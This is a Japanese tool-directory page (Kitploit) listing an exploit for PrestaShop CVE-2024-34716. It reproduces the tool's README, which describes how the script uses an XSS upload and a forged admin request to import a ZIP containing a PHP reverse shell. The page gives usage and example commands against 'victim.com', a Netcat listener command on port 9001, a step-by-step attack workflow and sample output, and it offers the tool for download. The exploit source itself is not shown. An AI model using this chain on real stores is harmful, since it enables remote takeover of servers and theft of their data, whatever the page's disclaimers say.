Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Prestashop-CVE-2024-34716 — PrestaShop用の自動化されたCSRFエクスプロイトスクリプト。巧妙に作られたZIPペイロードを介してPHPリバースシェルをアップロードして実行し、接続をキャプチャするためにNetcatリスナーが必要です。 | Kitploit
ツール/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
ペイロード生成エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

PrestaShop用の自動化されたCSRFエクスプロイトスクリプト。巧妙に作られたZIPペイロードを介してPHPリバースシェルをアップロードして実行し、接続をキャプチャするためにNetcatリスナーが必要です。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CSRFおよびリバースシェル攻撃のためのエクスプロイトスクリプト

このスクリプトは、CSRF(クロスサイトリクエストフォージェリ)エクスプロイトを自動化し、ターゲットのWebサーバーにPHPリバースシェルをアップロードして実行します。リバースシェルは、細工されたCSRFペイロードを介してZIPファイルとして配信され、特権ユーザーが特定のエンドポイントと対話するとトリガーされます。このスクリプトでは、リバースシェル接続をキャプチャするために、Netcatリスナーを実行している必要があります。

現在は壊れているようです。後で更新します。

必要条件

  • Netcat: Netcatがインストールされ、指定されたポート(デフォルト:9001)で待受可能であることを確認してください。
  • Python 3: HTTP経由でファイルを提供するために使用します。
  • Curl & JQ: HTTPリクエストの取得とJSON解析の処理に使用します。

使用方法

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

引数

  • target_url: ターゲットのベースURL(例:https://example.com)。
  • admin_endpoint: 管理テーマインポートエンドポイントへのパス。
  • admin_email: 管理者のメールアドレス(ペイロードで偽装するため)。
  • attacker_ip: リバースシェルリスナーが接続を受信するIPアドレス。

例

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

エクスプロイトのワークフロー

  1. リバースシェルの作成: 指定されたattacker_ipとポート9001を使用して、revshells.comでPHPリバースシェルを生成します。
  2. ZIPパッケージ化: リバースシェルスクリプト(love.php)をLove-exploit.zipに圧縮します。
  3. CSRFトークンの取得: テーマインポートリクエストを承認するために、ターゲットからCSRFトークンを取得します。
  4. HTMLペイロードの構築: JavaScriptスクリプトを含むHTMLペイロード(csrf_payload.html)を構築し、ターゲットの管理パネルに自動的に悪意のあるリクエストを送信してリバースシェルをインポートします。
  5. HTTPサーバーのセットアップ: ポート8000の一時的なHTTPサーバーが、ターゲットがインポートするためにLove-exploit.zipを提供します。
  6. XSSアップロードとCSRFトリガー: CSRFペイロードがターゲットの問い合わせページにアップロードされます。アクセスされると、CSRF攻撃がトリガーされます。
  7. リバースシェルリスナー: 攻撃者はNetcatを使用して被害者からの着信接続を監視します。

実行手順

  1. マシンでNetcatリスナーを起動します:

    root@kitploit:~
    nc -nvlp 9001
    
  2. スクリプトを実行します:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. ターゲットがCSRFペイロードを実行し、リバースシェル接続を受信するのを待ちます。

出力

スクリプトは実行中に以下の情報を出力します:

  • CSRFトークンの取得ステータス。
  • リバースシェルの作成とパッケージ化のステータス。
  • ペイロード配信のステータスとHTTPサーバーのステータス。

重要な注意事項

  • 許可: このスクリプトはターゲットサーバー上で実行する許可が必要です。許可のない使用は違法であり、法律で罰せられます。
  • テスト環境: サイバーセキュリティラボなど、管理・許可された環境でのみ使用してください。
  • ポートの競合: スクリプトを実行する前に、ポート8000(HTTPサーバー)と9001(Netcatリスナー)が空いていることを確認してください。

出力例

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

このドキュメントは、管理された環境でのペネトレーションテスターおよびサイバーセキュリティ研究者による使用を目的としています。このツールを不正な目的で悪用することは固く禁止されています。


免責事項

このスクリプトは教育目的および法的なサイバーセキュリティ評価のみを目的としています。許可なくシステムに対して不正使用することは違法であり、倫理ガイドラインに反します。

ツールをダウンロード